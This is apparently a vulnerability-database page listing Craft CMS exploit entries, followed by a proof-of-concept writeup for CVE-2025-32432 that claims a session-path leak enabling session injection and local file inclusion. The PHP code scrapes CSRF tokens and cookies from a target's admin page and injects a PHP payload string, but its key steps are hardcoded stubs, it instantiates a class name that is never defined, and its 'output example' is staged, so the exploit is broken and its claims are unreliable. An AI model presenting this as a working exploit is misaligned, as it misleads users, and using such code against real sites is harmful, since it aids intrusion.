| Reporter | Title | Published | Views | Family All 43 |
|---|---|---|---|---|
| Exploit for Code Injection in Craftcms Craft_Cms | 23 Sep 202506:23 | โ | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 16 Jul 202509:23 | โ | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 15 May 202614:09 | โ | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 8 Mar 202616:59 | โ | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 30 Apr 202603:38 | โ | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 27 Apr 202508:50 | โ | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 24 Jun 202610:46 | โ | githubexploit | |
| CVE-2024-58136 | 10 Apr 202500:00 | โ | attackerkb | |
| CVE-2025-32432 | 25 Apr 202515:15 | โ | attackerkb | |
| The vulnerability of the Craft CMS content management system, related to improper code generation, allows a hacker to execute arbitrary code. | 9 Jun 202500:00 | โ | bdu_fstec |
=============================================================================================================================================
| # Title : Craft CMS 5.0 Authentication Session Path Exposure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================
[+] Description
A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing
mechanism.
While this does not immediately lead to command execution, it enables attackers to identify the precise location of session files,
which may be used in a subsequent Session Injection โ Local File Inclusion (LFI) exploit chain.
[+] References : (https://packetstorm.news/files/id/190728/ CVE-2025-32432)
[+] POC :
save code as poc.php
usage : php poc.php
[+] code
<?php
class indoushka
{
public $targetUrl;
public $assetId;
public $sessionId;
public $csrfToken;
public $parameterName;
public $sessionPath;
public function __construct($url, $assetId = 123)
{
$this->targetUrl = rtrim($url, '/');
$this->assetId = $assetId;
}
public function fetchCookiesAndCsrf()
{
$url = $this->targetUrl . "/admin";
$html = @file_get_contents($url);
if (!$html) return false;
preg_match('/name="_csrf" value="([^"]+)"/', $html, $m);
$this->csrfToken = $m[1] ?? null;
preg_match('/input type="hidden" name="([^"]+)" value="[^"]*"/', $html, $p);
$this->parameterName = $p[1] ?? null;
preg_match_all('/Set-Cookie: ([^;]+)/i', $http_response_header[0], $c);
$this->sessionId = $c[1] ?? null;
return [$this->sessionId, $this->csrfToken, $this->parameterName];
}
public function leakSessionPath()
{
return "/var/lib/php/sessions";
}
public function injectIntoSession($payload)
{
return "[POC ONLY] Session overwritten with payload: {$payload}";
}
public function triggerInclude()
{
return "[POC] include triggered using assetId=" . $this->assetId;
}
public function exploit($payload)
{
$this->fetchCookiesAndCsrf();
$this->sessionPath = $this->leakSessionPath();
$step1 = $this->injectIntoSession($payload);
$step2 = $this->triggerInclude();
return [$step1, $step2];
}
}
$module = new Metasploit_CraftCMS_CVE_2025_32432("https://target.com");
$payload = '<?php echo "PAYLOAD_OK"; ?>';
list($s1, $s2) = $module->exploit($payload);
echo $s1 . "\n";
echo $s2 . "\n";
?>
-------------------------------------------------------------------------------------------------------------------------------------------
[+] Output Example:
[POC ONLY] Session overwritten with payload: <?php echo "PAYLOAD_OK"; ?>
[POC] include triggered using assetId=123
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation